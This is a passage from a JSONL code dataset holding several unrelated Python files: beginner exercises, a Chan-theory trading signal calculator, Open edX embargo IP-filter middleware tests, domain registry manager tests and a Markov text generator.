available_clusters)\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"antiadblock/tests/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":7683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"10447441478","text":"\n# Declarando as variáveis\na = 2\nb = 3\n\n# Montando o if-elif-else\nif a == b:\n print('A é igual a B')\nelif a < b:\n print('A é menor do B')\nelse:\n print('A maior do que B')\n","repo_name":"AlexandreNonato78/Exercicios_Python_GuanabaraM1","sub_path":"pacote-download/Exercicios/04declarandoVariaveis.py","file_name":"04declarandoVariaveis.py","file_ext":"py","file_size_in_byte":177,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"43283294930","text":"import sys\nsys.stdin = open(\"04_creditcard_1.txt\")\n\nfor t in range(1, int(input()) + 1):\n num_list = list(map(int,input().split()))\n total = 0\n for i in range(1, 16):\n if i % 2 == 1:\n total += (num_list[i-1]*2)\n else:\n total += num_list[i-1]\n N = 10 - (total % 10)\n if N == 10:\n N = 0\n print(f'#{t} {N}')\n","repo_name":"OIIUOI/Multicampus","sub_path":"220729/04.py","file_name":"04.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"2768970975","text":"from typing import Generic, List, Optional, TypeVar, Union, overload\n\nfrom Bi.Bi import CBi\nfrom Bi.BiList import CBiList\nfrom Common.CEnum import BSP_TYPE\nfrom Common.func_util import has_overlap\nfrom Seg.Seg import CSeg\nfrom Seg.SegListComm import CSegListComm\nfrom ZS.ZS import CZS\n\nfrom .BS_Point import CBS_Point\nfrom .BSPointConfig import CBSPointConfig, CPointConfig\n\nLINE_TYPE = TypeVar('LINE_TYPE', CBi, CSeg[CBi])\nLINE_LIST_TYPE = TypeVar('LINE_LIST_TYPE', CBiList, CSegListComm[CBi])\n\n\nclass CBSPointList(Generic[LINE_TYPE, LINE_LIST_TYPE]):\n def __init__(self, bs_point_config: CBSPointConfig):\n self.lst: List[CBS_Point[LINE_TYPE]] = []\n self.bsp1_lst: List[CBS_Point[LINE_TYPE]] = []\n self.config = bs_point_config\n self.last_sure_pos = -1\n\n def __iter__(self):\n yield from self.lst\n\n def __len__(self):\n return len(self.lst)\n\n @overload\n def __getitem__(self, index: int) -> CBS_Point: ...\n\n @overload\n def __getitem__(self, index: slice) -> List[CBS_Point]: ...\n\n def __getitem__(self, index: Union[slice, int]) -> Union[List[CBS_Point], CBS_Point]:\n return self.lst[index]\n\n def cal(self, bi_list: LINE_LIST_TYPE, seg_list: CSegListComm[LINE_TYPE]):\n self.lst = [bsp for bsp in self.lst if bsp.klu.idx <= self.last_sure_pos]\n self.bsp1_lst = [bsp for bsp in self.bsp1_lst if bsp.klu.idx <= self.last_sure_pos]\n\n self.cal_seg_bs1point(seg_list, bi_list)\n self.cal_seg_bs2point(seg_list, bi_list)\n self.cal_seg_bs3point(seg_list, bi_list)\n\n self.update_last_pos(seg_list)\n\n def update_last_pos(self, seg_list: CSegListComm):\n self.last_sure_pos = -1\n for seg in seg_list[::-1]:\n if seg.is_sure:\n self.last_sure_pos = seg.end_bi.get_begin_klu().idx\n return\n\n def seg_need_cal(self, seg: CSeg):\n return seg.end_bi.get_end_klu().idx > self.last_sure_pos\n\n def add_bs(\n self,\n bs_type: BSP_TYPE,\n bi: LINE_TYPE,\n relate_bsp1: Optional[CBS_Point],\n is_target_bsp: bool = True,\n feature_dict=None,\n ):\n is_buy = bi.is_down()\n for exist_bsp in self.lst:\n if exist_bsp.klu.idx == bi.get_end_klu().idx:\n assert exist_bsp.is_buy == is_buy\n exist_bsp.add_another_bsp_prop(bs_type, relate_bsp1)\n return\n if bs_type not in self.config.GetBSConfig(is_buy).target_types:\n is_target_bsp = False\n\n if is_target_bsp or bs_type in [BSP_TYPE.T1, BSP_TYPE.T1P]:\n bsp = CBS_Point[LINE_TYPE](\n bi=bi,\n is_buy=is_buy,\n bs_type=bs_type,\n relate_bsp1=relate_bsp1,\n feature_dict=feature_dict,\n )\n else:\n return\n if is_target_bsp:\n self.lst.append(bsp)\n if bs_type in [BSP_TYPE.T1, BSP_TYPE.T1P]:\n self.bsp1_lst.append(bsp)\n\n def cal_seg_bs1point(self, seg_list: CSegListComm[LINE_TYPE], bi_list: LINE_LIST_TYPE):\n for seg in seg_list:\n if not self.seg_need_cal(seg):\n continue\n self.cal_single_bs1point(seg, bi_list)\n\n def cal_single_bs1point(self, seg: CSeg[LINE_TYPE], bi_list: LINE_LIST_TYPE):\n BSP_CONF = self.config.GetBSConfig(seg.is_down())\n zs_cnt = seg.get_multi_bi_zs_cnt() if BSP_CONF.bsp1_only_multibi_zs else len(seg.zs_lst)\n is_target_bsp = (BSP_CONF.min_zs_cnt <= 0 or zs_cnt >= BSP_CONF.min_zs_cnt)\n if len(seg.zs_lst) > 0 and \\\n not seg.zs_lst[-1].is_one_bi_zs() and \\\n ((seg.zs_lst[-1].bi_out and seg.zs_lst[-1].bi_out.idx >= seg.end_bi.idx) or seg.zs_lst[-1].bi_lst[-1].idx >= seg.end_bi.idx) \\\n and seg.end_bi.idx - seg.zs_lst[-1].get_bi_in().idx > 2:\n self.treat_bsp1(seg, BSP_CONF, is_target_bsp)\n else:\n self.treat_pz_bsp1(seg, BSP_CONF, bi_list, is_target_bsp)\n\n def treat_bsp1(self, seg: CSeg[LINE_TYPE], BSP_CONF: CPointConfig, is_target_bsp: bool):\n last_zs = seg.zs_lst[-1]\n break_peak, _ = last_zs.out_bi_is_peak(seg.end_bi.idx)\n if BSP_CONF.bs1_peak and not break_peak:\n is_target_bsp = False\n is_diver, divergence_rate = last_zs.is_divergence(BSP_CONF, out_bi=seg.end_bi)\n if not is_diver:\n is_target_bsp = False\n feature_dict = {'divergence_rate': divergence_rate}\n self.add_bs(bs_type=BSP_TYPE.T1, bi=seg.end_bi, relate_bsp1=None, is_target_bsp=is_target_bsp, feature_dict=feature_dict)\n\n def treat_pz_bsp1(self, seg: CSeg[LINE_TYPE], BSP_CONF: CPointConfig, bi_list: LINE_LIST_TYPE, is_target_bsp):\n last_bi = seg.end_bi\n pre_bi = bi_list[last_bi.idx-2]\n if last_bi.seg_idx != pre_bi.seg_idx:\n return\n if last_bi.dir != seg.dir:\n return\n if last_bi.is_down() and last_bi._low() > pre_bi._low(): # 创新低\n return\n if last_bi.is_up() and last_bi._high() < pre_bi._high(): # 创新高\n return\n in_metric = pre_bi.cal_macd_metric(BSP_CONF.macd_algo, is_reverse=False)\n out_metric = last_bi.cal_macd_metric(BSP_CONF.macd_algo, is_reverse=True)\n is_diver, divergence_rate = out_metric <= BSP_CONF.divergence_rate*in_metric, out_metric/(in_metric+1e-7)\n if not is_diver:\n is_target_bsp = False\n if isinstance(bi_list, CBiList):\n assert isinstance(last_bi, CBi) and isinstance(pre_bi, CBi)\n feature_dict = {'divergence_rate': divergence_rate}\n self.add_bs(bs_type=BSP_TYPE.T1P, bi=last_bi, relate_bsp1=None, is_target_bsp=is_target_bsp, feature_dict=feature_dict)\n\n def cal_seg_bs2point(self, seg_list: CSegListComm[LINE_TYPE], bi_list: LINE_LIST_TYPE):\n bsp1_bi_idx_dict = {bsp.bi.idx: bsp for bsp in self.bsp1_lst}\n for seg in seg_list:\n self.treat_bsp2(seg, bsp1_bi_idx_dict, seg_list, bi_list)\n\n def treat_bsp2(self, seg: CSeg, bsp1_bi_idx_dict, seg_list: CSegListComm[LINE_TYPE], bi_list: LINE_LIST_TYPE):\n if not self.seg_need_cal(seg):\n return\n if len(seg_list) > 1:\n BSP_CONF = self.config.GetBSConfig(seg.is_down())\n bsp1_bi = seg.end_bi\n bsp1_bi_idx = bsp1_bi.idx\n real_bsp1 = bsp1_bi_idx_dict.get(bsp1_bi.idx)\n if bsp1_bi.idx + 2 >= len(bi_list):\n return\n break_bi = bi_list[bsp1_bi.idx + 1]\n bsp2_bi = bi_list[bsp1_bi.idx + 2]\n else:\n BSP_CONF = self.config.GetBSConfig(seg.is_up())\n bsp1_bi, real_bsp1 = None, None\n bsp1_bi_idx = -1\n if len(bi_list) == 1:\n return\n bsp2_bi = bi_list[1]\n break_bi = bi_list[0]\n if BSP_CONF.bsp2_follow_1 and bsp1_bi_idx not in bsp1_bi_idx_dict: # check bsp2_follow_1\n return\n retrace_rate = bsp2_bi.amp()/break_bi.amp()\n bsp2_flag = retrace_rate <= BSP_CONF.max_bs2_rate\n if bsp2_flag:\n self.add_bs(bs_type=BSP_TYPE.T2, bi=bsp2_bi, relate_bsp1=real_bsp1) # type: ignore\n elif BSP_CONF.bsp2s_follow_2:\n return\n self.treat_bsp2s(seg_list, bi_list, bsp2_bi, break_bi, real_bsp1, BSP_CONF) # type: ignore\n\n def treat_bsp2s(\n self,\n seg_list: CSegListComm,\n bi_list: LINE_LIST_TYPE,\n bsp2_bi: LINE_TYPE,\n break_bi: LINE_TYPE,\n real_bsp1: Optional[CBS_Point],\n BSP_CONF: CPointConfig,\n ):\n bias = 2\n _low, _high = None, None\n while bsp2_bi.idx + bias < len(bi_list): # 计算类二\n bsp2s_bi = bi_list[bsp2_bi.idx + bias]\n assert bsp2s_bi.seg_idx is not None and bsp2_bi.seg_idx is not None\n if BSP_CONF.max_bsp2s_lv is not None and bias/2 > BSP_CONF.max_bsp2s_lv:\n break\n if bsp2s_bi.seg_idx != bsp2_bi.seg_idx and (bsp2s_bi.seg_idx < len(seg_list)-1 or seg_list[bsp2_bi.seg_idx].is_sure):\n break\n if bias == 2:\n if not has_overlap(bsp2_bi._low(), bsp2_bi._high(), bsp2s_bi._low(), bsp2s_bi._high()):\n break\n _low = max([bsp2_bi._low(), bsp2s_bi._low()])\n _high = min([bsp2_bi._high(), bsp2s_bi._high()])\n elif not has_overlap(_low, _high, bsp2s_bi._low(), bsp2s_bi._high()):\n break\n\n if bsp2s_break_bsp1(bsp2s_bi, break_bi):\n break\n retrace_rate = abs(bsp2s_bi.get_end_val()-break_bi.get_end_val())/break_bi.amp()\n if retrace_rate > BSP_CONF.max_bs2_rate:\n break\n\n self.add_bs(bs_type=BSP_TYPE.T2S, bi=bsp2s_bi, relate_bsp1=real_bsp1) # type: ignore\n bias += 2\n\n def cal_seg_bs3point(self, seg_list: CSegListComm[LINE_TYPE], bi_list: LINE_LIST_TYPE):\n bsp1_bi_idx_dict = {bsp.bi.idx: bsp for bsp in self.bsp1_lst}\n for seg in seg_list:\n if not self.seg_need_cal(seg):\n continue\n if len(seg_list) > 1:\n bsp1_bi = seg.end_bi\n bsp1_bi_idx = bsp1_bi.idx\n BSP_CONF = self.config.GetBSConfig(seg.is_down())\n real_bsp1 = bsp1_bi_idx_dict.get(bsp1_bi.idx)\n next_seg_idx = seg.idx+1\n next_seg = seg.next # 可能为None, 所以并不一定可以保证next_seg_idx == next_seg.idx\n else:\n next_seg = seg\n next_seg_idx = seg.idx\n bsp1_bi, real_bsp1 = None, None\n bsp1_bi_idx = -1\n BSP_CONF = self.config.GetBSConfig(seg.is_up())\n if BSP_CONF.bsp3_follow_1 and bsp1_bi_idx not in bsp1_bi_idx_dict:\n continue\n if next_seg:\n self.treat_bsp3_after(seg_list, next_seg, BSP_CONF, bi_list, real_bsp1, bsp1_bi_idx, next_seg_idx)\n self.treat_bsp3_before(seg_list, seg, next_seg, bsp1_bi, BSP_CONF, bi_list, real_bsp1, next_seg_idx)\n\n def treat_bsp3_after(\n self,\n seg_list: CSegListComm[LINE_TYPE],\n next_seg: CSeg[LINE_TYPE],\n BSP_CONF: CPointConfig,\n bi_list: LINE_LIST_TYPE,\n real_bsp1,\n bsp1_bi_idx,\n next_seg_idx\n ):\n first_zs = next_seg.get_first_multi_bi_zs()\n if first_zs is None:\n return\n if BSP_CONF.strict_bsp3 and first_zs.get_bi_in().idx != bsp1_bi_idx+1:\n return\n if first_zs.bi_out is None or first_zs.bi_out.idx+1 >= len(bi_list):\n return\n bsp3_bi = bi_list[first_zs.bi_out.idx+1]\n if bsp3_bi.parent_seg is None:\n if next_seg.idx != len(seg_list)-1:\n return\n elif bsp3_bi.parent_seg.idx != next_seg.idx:\n return\n if bsp3_bi.dir == next_seg.dir:\n return\n if bsp3_bi.seg_idx != next_seg_idx and next_seg_idx < len(seg_list)-2:\n return\n if bsp3_back2zs(bsp3_bi, first_zs):\n return\n bsp3_peak_zs = bsp3_break_zspeak(bsp3_bi, first_zs)\n if BSP_CONF.bsp3_peak and not bsp3_peak_zs:\n return\n self.add_bs(bs_type=BSP_TYPE.T3A, bi=bsp3_bi, relate_bsp1=real_bsp1) # type: ignore\n\n def treat_bsp3_before(\n self,\n seg_list: CSegListComm[LINE_TYPE],\n seg: CSeg[LINE_TYPE],\n next_seg: Optional[CSeg[LINE_TYPE]],\n bsp1_bi: Optional[LINE_TYPE],\n BSP_CONF: CPointConfig,\n bi_list: LINE_LIST_TYPE,\n real_bsp1,\n next_seg_idx\n ):\n cmp_zs = seg.get_final_multi_bi_zs()\n if cmp_zs is None:\n return\n if not bsp1_bi:\n return\n if BSP_CONF.strict_bsp3 and (cmp_zs.bi_out is None or cmp_zs.bi_out.idx != bsp1_bi.idx):\n return\n end_bi_idx = cal_bsp3_bi_end_idx(next_seg)\n for bsp3_bi in bi_list[bsp1_bi.idx+2::2]:\n if bsp3_bi.idx > end_bi_idx:\n break\n assert bsp3_bi.seg_idx is not None\n if bsp3_bi.seg_idx != next_seg_idx and bsp3_bi.seg_idx < len(seg_list)-1:\n break\n if bsp3_back2zs(bsp3_bi, cmp_zs): # type: ignore\n continue\n self.add_bs(bs_type=BSP_TYPE.T3B, bi=bsp3_bi, relate_bsp1=real_bsp1) # type: ignore\n break\n\n def getLastestBspList(self) -> List[CBS_Point[LINE_TYPE]]:\n if len(self.lst) == 0:\n return []\n return sorted(self.lst, key=lambda bsp: bsp.bi.idx, reverse=True)\n\n\ndef bsp2s_break_bsp1(bsp2s_bi: LINE_TYPE, bsp2_break_bi: LINE_TYPE) -> bool:\n return (bsp2s_bi.is_down() and bsp2s_bi._low() < bsp2_break_bi._low()) or \\\n (bsp2s_bi.is_up() and bsp2s_bi._high() > bsp2_break_bi._high())\n\n\ndef bsp3_back2zs(bsp3_bi: LINE_TYPE, zs: CZS) -> bool:\n return (bsp3_bi.is_down() and bsp3_bi._low() < zs.high) or (bsp3_bi.is_up() and bsp3_bi._high() > zs.low)\n\n\ndef bsp3_break_zspeak(bsp3_bi: LINE_TYPE, zs: CZS) -> bool:\n return (bsp3_bi.is_down() and bsp3_bi._high() >= zs.peak_high) or (bsp3_bi.is_up() and bsp3_bi._low() <= zs.peak_low)\n\n\ndef cal_bsp3_bi_end_idx(seg: Optional[CSeg[LINE_TYPE]]):\n if not seg:\n return float(\"inf\")\n if seg.get_multi_bi_zs_cnt() == 0 and seg.next is None:\n return float(\"inf\")\n end_bi_idx = seg.end_bi.idx-1\n for zs in seg.zs_lst:\n if zs.is_one_bi_zs():\n continue\n if zs.bi_out is not None:\n end_bi_idx = zs.bi_out.idx\n break\n return end_bi_idx\n","repo_name":"Vespa314/chan.py","sub_path":"BuySellPoint/BSPointList.py","file_name":"BSPointList.py","file_ext":"py","file_size_in_byte":13562,"program_lang":"python","lang":"en","doc_type":"code","stars":382,"dataset":"github-code","pt":"3"} +{"seq_id":"12613994303","text":"\"\"\"\nTests for EmbargoMiddleware with CountryAccessRules\n\"\"\"\n\n\nfrom unittest.mock import patch\nimport ddt\nfrom config_models.models import cache as config_cache\nfrom django.conf import settings\nfrom django.core.cache import cache as django_cache\nfrom django.urls import reverse\nfrom edx_toggles.toggles.testutils import override_waffle_switch\nfrom xmodule.modulestore.tests.django_utils import ModuleStoreTestCase\nfrom xmodule.modulestore.tests.factories import CourseFactory\n\nfrom common.djangoapps.student.tests.factories import UserFactory\nfrom common.djangoapps.util.testing import UrlResetMixin\nfrom openedx.core.djangoapps.util.legacy_ip import USE_LEGACY_IP\nfrom openedx.core.djangolib.testing.utils import skip_unless_lms\n\nfrom ..models import IPFilter, RestrictedCourse\nfrom ..test_utils import restrict_course\n\n\n@ddt.ddt\n@skip_unless_lms\nclass EmbargoMiddlewareAccessTests(UrlResetMixin, ModuleStoreTestCase):\n \"\"\"Tests of embargo middleware country access rules.\n\n There are detailed unit tests for the rule logic in\n `test_api.py`; here, we're mainly testing the integration\n with middleware\n\n \"\"\"\n USERNAME = 'fred'\n PASSWORD = 'secret'\n\n URLCONF_MODULES = ['openedx.core.djangoapps.embargo']\n\n @patch.dict(settings.FEATURES, {'EMBARGO': True})\n def setUp(self):\n super().setUp()\n self.user = UserFactory(username=self.USERNAME, password=self.PASSWORD)\n self.course = CourseFactory.create()\n self.client.login(username=self.USERNAME, password=self.PASSWORD)\n\n self.courseware_url = reverse('about_course', kwargs={'course_id': str(self.course.id)})\n self.non_courseware_url = reverse('dashboard')\n\n # Clear the cache to avoid interference between tests\n django_cache.clear()\n config_cache.clear()\n\n @patch.dict(settings.FEATURES, {'EMBARGO': True})\n @ddt.data(True, False)\n def test_blocked(self, disable_access_check):\n with restrict_course(self.course.id, access_point='courseware', disable_access_check=disable_access_check) as redirect_url: # pylint: disable=line-too-long\n response = self.client.get(self.courseware_url)\n if disable_access_check:\n assert response.status_code == 200\n else:\n self.assertRedirects(response, redirect_url)\n\n @patch.dict(settings.FEATURES, {'EMBARGO': True})\n def test_allowed(self):\n # Add the course to the list of restricted courses\n # but don't create any access rules\n RestrictedCourse.objects.create(course_key=self.course.id)\n\n # Expect that we can access courseware\n response = self.client.get(self.courseware_url)\n assert response.status_code == 200\n\n @patch.dict(settings.FEATURES, {'EMBARGO': True})\n def test_non_courseware_url(self):\n with restrict_course(self.course.id):\n response = self.client.get(self.non_courseware_url)\n assert response.status_code == 200\n\n @patch.dict(settings.FEATURES, {'EMBARGO': True})\n @ddt.data(\n # request ip chain, blacklist, whitelist, is_enabled, allow_access\n (['192.178.2.3'], [], [], True, True), # confirm that test setup & no config allows users by default\n (['173.194.123.35'], ['173.194.123.35'], [], True, False),\n (['173.194.123.35'], ['173.194.0.0/16'], [], True, False),\n (['173.194.123.35'], ['127.0.0.0/32', '173.194.0.0/16'], [], True, False),\n (['173.195.10.20'], ['173.194.0.0/16'], [], True, True),\n (['173.194.123.35'], ['173.194.0.0/16'], ['173.194.0.0/16'], True, False), # blacklist checked before whitelist\n (['173.194.123.35', '192.178.2.3'], ['173.194.123.35'], [], True, False), # earlier ip can still be blocked\n (['173.194.123.35'], ['173.194.123.35'], [], False, True), # blacklist disabled\n )\n @ddt.unpack\n def test_ip_blacklist_rules(self, request_ips, blacklist, whitelist, is_enabled, allow_access):\n # Ensure that IP blocking works for anonymous users\n self.client.logout()\n\n # Set up the IP rules\n IPFilter.objects.create(\n blacklist=\", \".join(blacklist),\n whitelist=\", \".join(whitelist),\n enabled=is_enabled\n )\n\n # Check that access is enforced\n response = self.client.get(\n self.courseware_url,\n HTTP_X_FORWARDED_FOR=','.join(request_ips),\n REMOTE_ADDR=request_ips[-1],\n )\n\n if allow_access:\n assert response.status_code == 200\n else:\n redirect_url = reverse(\n 'embargo:blocked_message',\n kwargs={\n 'access_point': 'courseware',\n 'message_key': 'embargo'\n }\n )\n self.assertRedirects(response, redirect_url)\n\n @patch.dict(settings.FEATURES, {'EMBARGO': True})\n @ddt.data(\n # request ip chain, blacklist, whitelist, is_enabled, allow_access\n (['192.178.2.3'], [], [], True, False), # confirm that test setup & no config blocks users by default\n (['173.194.123.35', '192.178.2.3'], [], ['173.194.123.35'], True, False), # whitelist only looks at last ip\n (['192.178.2.3', '173.194.123.35'], [], ['173.194.0.0/16'], True, True),\n (['192.178.2.3'], [], ['173.194.0.0/16'], True, False),\n (['173.194.123.35'], [], ['173.194.123.35'], False, False), # whitelist disabled\n )\n @ddt.unpack\n def test_ip_whitelist_rules(self, request_ips, blacklist, whitelist, is_enabled, allow_access):\n # Ensure that IP blocking works for anonymous users\n self.client.logout()\n\n # Set up the IP rules\n IPFilter.objects.create(\n blacklist=\", \".join(blacklist),\n whitelist=\", \".join(whitelist),\n enabled=is_enabled\n )\n\n # Check that access is enforced (restrict course by default, so that allow-list logic is actually tested)\n with restrict_course(self.course.id):\n response = self.client.get(\n self.courseware_url,\n HTTP_X_FORWARDED_FOR=','.join(request_ips),\n REMOTE_ADDR=request_ips[-1],\n )\n\n if allow_access:\n assert response.status_code == 200\n else:\n redirect_url = reverse(\n 'embargo:blocked_message',\n kwargs={\n 'access_point': 'courseware',\n 'message_key': 'default'\n }\n )\n self.assertRedirects(response, redirect_url)\n\n @patch.dict(settings.FEATURES, {'EMBARGO': True})\n @override_waffle_switch(USE_LEGACY_IP, True)\n @ddt.data(\n # request ip chain, blacklist, whitelist, allow_access\n (['192.178.2.3'], [], [], False), # confirm that test setup & no config blocks users by default\n (['173.194.123.35', '192.178.2.3'], [], ['192.178.2.3'], False), # whitelist ignores last (safest) ip\n (['173.194.123.35', '192.178.2.3'], [], ['173.194.0.0/16'], True), # whitelist does look at first ip though\n )\n @ddt.unpack\n def test_ip_legacy_whitelist_rules(self, request_ips, blacklist, whitelist, allow_access):\n # Ensure that IP blocking works for anonymous users\n self.client.logout()\n\n # Set up the IP rules\n IPFilter.objects.create(\n blacklist=\", \".join(blacklist),\n whitelist=\", \".join(whitelist),\n enabled=True,\n )\n\n # Check that access is enforced (restrict course by default, so that allow-list logic is actually tested)\n with restrict_course(self.course.id):\n response = self.client.get(\n self.courseware_url,\n HTTP_X_FORWARDED_FOR=','.join(request_ips),\n REMOTE_ADDR=request_ips[-1],\n )\n\n if allow_access:\n assert response.status_code == 200\n else:\n redirect_url = reverse(\n 'embargo:blocked_message',\n kwargs={\n 'access_point': 'courseware',\n 'message_key': 'default',\n }\n )\n self.assertRedirects(response, redirect_url)\n\n @patch.dict(settings.FEATURES, {'EMBARGO': True})\n @override_waffle_switch(USE_LEGACY_IP, True)\n @ddt.data(\n # request ip chain, blacklist, whitelist, allow_access\n (['192.178.2.3'], [], [], True), # confirm that test setup & no config allows users by default\n (['173.194.123.35', '192.178.2.3'], ['192.178.2.3'], [], True), # blacklist ignores last (safest) ip\n (['173.194.123.35', '192.178.2.3'], ['173.194.123.35'], [], False), # blacklist looks at first though\n (['192.178.2.3'], ['192.178.2.3'], ['192.178.2.3'], False), # blacklist overrides whitelist\n )\n @ddt.unpack\n def test_ip_legacy_blacklist_rules(self, request_ips, blacklist, whitelist, allow_access):\n # Ensure that IP blocking works for anonymous users\n self.client.logout()\n\n # Set up the IP rules\n IPFilter.objects.create(\n blacklist=\", \".join(blacklist),\n whitelist=\", \".join(whitelist),\n enabled=True,\n )\n\n # Check that access is enforced\n response = self.client.get(\n self.courseware_url,\n HTTP_X_FORWARDED_FOR=','.join(request_ips),\n REMOTE_ADDR=request_ips[-1],\n )\n\n if allow_access:\n assert response.status_code == 200\n else:\n redirect_url = reverse(\n 'embargo:blocked_message',\n kwargs={\n 'access_point': 'courseware',\n 'message_key': 'embargo',\n }\n )\n self.assertRedirects(response, redirect_url)\n\n @patch.dict(settings.FEATURES, {'EMBARGO': True})\n @ddt.data(\n ('courseware', 'default'),\n ('courseware', 'embargo'),\n ('enrollment', 'default'),\n ('enrollment', 'embargo')\n )\n @ddt.unpack\n def test_always_allow_access_to_embargo_messages(self, access_point, msg_key):\n # Blacklist an IP address\n IPFilter.objects.create(\n blacklist=\"192.168.10.20\",\n enabled=True\n )\n\n url = reverse(\n 'embargo:blocked_message',\n kwargs={\n 'access_point': access_point,\n 'message_key': msg_key\n }\n )\n response = self.client.get(\n url,\n HTTP_X_FORWARDED_FOR=\"192.168.10.20\",\n REMOTE_ADDR=\"192.168.10.20\"\n )\n assert response.status_code == 200\n","repo_name":"openedx/edx-platform","sub_path":"openedx/core/djangoapps/embargo/tests/test_middleware.py","file_name":"test_middleware.py","file_ext":"py","file_size_in_byte":10662,"program_lang":"python","lang":"en","doc_type":"code","stars":6774,"dataset":"github-code","pt":"3"} +{"seq_id":"33177669782","text":"#\n# ps8pr2.py (Problem Set 8, Problem 2)\n#\n# Markov text generation \n#\n\nimport random\n\n# Function 1\ndef create_dictionary(filename):\n \"\"\" returns a dictionary of key-value pairs in which:\n each key is a word encountered in the text file and\n the corresponding value is a list of words that follow \n the key word in the text file \"\"\"\n file = open(filename, 'r')\n text = file.read()\n file.close()\n \n words = text.split()\n d = {}\n current_word = '$'\n \n for word in words:\n if current_word not in d:\n d[current_word] = [word]\n else:\n d[current_word] += [word]\n if word[-1] in '.?!':\n current_word = '$'\n else:\n current_word = word\n \n return d\n\n# Function 2\ndef generate_text(word_dict, num_words):\n \"\"\" takes as parameters a dictionary of word transitions \n (generated by the create_dictionary function) named \n word_dict and a positive integer named num_words. \"\"\"\n current_word = '$'\n \n for i in range(num_words):\n wordlist = word_dict[current_word]\n next_word = random.choice(wordlist)\n print(next_word, end=' ')\n \n if next_word[-1] in '.?!':\n current_word = '$'\n else:\n current_word = next_word\n\n","repo_name":"Tim4316/CS-111-Python-","sub_path":"Problem Sets/PS 8/ps8pr2.py","file_name":"ps8pr2.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7153969653","text":"from unittest.mock import patch, ANY\nfrom .test_setup import TestSetup\nfrom ..exceptions import InvalidTld\nfrom ..utilities.domain import parse_domain\nfrom ..entity_management.contacts import (\n RegistrantManager,\n ContactAction\n)\nfrom ..models import (\n RegisteredDomain,\n)\nfrom ..entity_management.domains import DomainManager\nimport domain_api\n\n\nclass MockRpcClient(domain_api.epp.entity.EppRpcClient):\n def __init__(self, host=None):\n pass\n\nclass TestContactManager(TestSetup):\n \"\"\"\n Test contact management stuff.\n \"\"\"\n\n @patch('domain_api.epp.entity.EppRpcClient', new=MockRpcClient)\n def test_create_contact_payload(self):\n registrant_factory = RegistrantManager(\n provider=self.centralnic_test,\n template=self.joe_user,\n user=self.test_customer_user\n )\n create_return_value = {\n \"id\": \"A1234\",\n \"create_date\": \"2017-03-01T12:00:00Z\"\n }\n\n with patch.object(ContactAction,\n 'create',\n return_value=create_return_value) as mocked:\n registrant = registrant_factory.create_registry_contact()\n\n actual_data = {\n 'id': ANY,\n 'voice': '+1.8175551234',\n 'fax': '',\n 'email': 'joeuser@test.com',\n 'postalInfo': {\n 'name': 'Joe User',\n 'org': '',\n 'type': 'loc',\n 'addr': {\n 'street': ['10 Evergreen Terrace'],\n 'city': 'Springfield',\n 'sp': 'State',\n 'pc': '97835',\n 'cc': 'US'}\n },\n 'disclose': {\n 'flag': 0,\n 'disclosing': [\n {'name': 'name', 'type': 'loc'},\n {'name': 'org', 'type': 'loc'},\n {'name': 'addr', 'type': 'loc'},\n 'voice', 'fax', 'email'\n ]\n }\n }\n mocked.assert_called_with('centralnic-test', actual_data)\n self.assertEqual(self.joe_user.id,\n registrant.account_template.id,\n 'Account template is equal')\n\n @patch('domain_api.epp.entity.EppRpcClient', new=MockRpcClient)\n def test_update_postal_data(self):\n registrant_factory = RegistrantManager(contact=\"registrant-123\")\n update_return_value = {}\n update_contact_data = {\n \"name\": \"Joe Luser\",\n \"city\": \"Shelbeyville\",\n \"state\": \"Flyover\",\n \"telephone\": \"+1.8172221233\",\n \"non_disclose\": [\n \"name\",\n \"address\",\n \"company\",\n \"telephone\",\n \"email\",\n \"fax\"\n ],\n \"disclose_email\": True,\n \"status\": \"ok;clientHappy;linked\"\n }\n\n with patch.object(ContactAction,\n 'update',\n return_value=update_return_value) as mocked:\n registrant_factory.update_contact(update_contact_data)\n\n actual_data = {\n 'id': \"registrant-123\",\n 'chg': {\n 'postalInfo': {\n 'name': 'Joe Luser',\n 'type': 'loc',\n 'addr': {\n 'city': 'Shelbeyville',\n 'sp': 'Flyover',\n 'cc': 'US'\n }\n },\n 'voice': '+1.8172221233',\n 'disclose': {\n 'flag': 0,\n 'disclosing': [\n {\"name\": \"name\", \"type\": \"loc\"},\n {\"name\": \"org\", \"type\": \"loc\"},\n {\"name\": \"addr\", \"type\": \"loc\"},\n 'voice',\n 'fax',\n 'email'\n ]\n }\n },\n 'add': ['ok', 'clientHappy', 'linked']\n }\n mocked.assert_called_with('centralnic-test', actual_data)\n\n\nclass TestDomainManager(TestSetup):\n \"\"\"\n Test domain management stuff.\n \"\"\"\n\n def setUp(self):\n \"\"\"\n Setup test suite\n \"\"\"\n super().setUp()\n self.registered_domain = RegisteredDomain.objects.get(\n name=\"test-something\",\n tld__zone=\"bar\",\n active=True\n )\n\n\n def test_parse_domain_components(self):\n \"\"\"\n Request for domains with a specific tld should return a manager\n that can handle the tld.\n \"\"\"\n parsed_domain = parse_domain(\"somedomain.ote\")\n self.assertEqual(parsed_domain[\"domain\"], \"somedomain\")\n self.assertEqual(parsed_domain[\"zone\"], \"ote\")\n parsed_domain = parse_domain(\"some.other.ote\")\n self.assertEqual(parsed_domain[\"domain\"], \"other\")\n self.assertEqual(parsed_domain[\"zone\"], \"ote\")\n\n def test_invalid_tld(self):\n \"\"\"\n Should throw an invalid tld exception when tld does not exist.\n \"\"\"\n with self.assertRaises(InvalidTld):\n parse_domain(\"tld-doesnot.exist\")\n\n def test_successful_update_domain_registrant(self):\n \"\"\"\n Test ability to successfully update a domain with a new registrant if\n the registry has accepted our create domain request.\n \"\"\"\n epp = {\n \"name\": \"test-something.bar\",\n \"chg\": {\"registrant\": \"registrant-231\" }\n }\n with patch.object(DomainManager, 'connect_domain_to_registrant') as mock:\n domain_manager = DomainManager(self.registered_domain)\n domain_manager.update(epp)\n mock.assert_called_with(\"registrant-231\")\n\n def test_successful_update_domain_contacts(self):\n \"\"\"\n Test ability to update a domain by adding/removing contacts\n\n \"\"\"\n 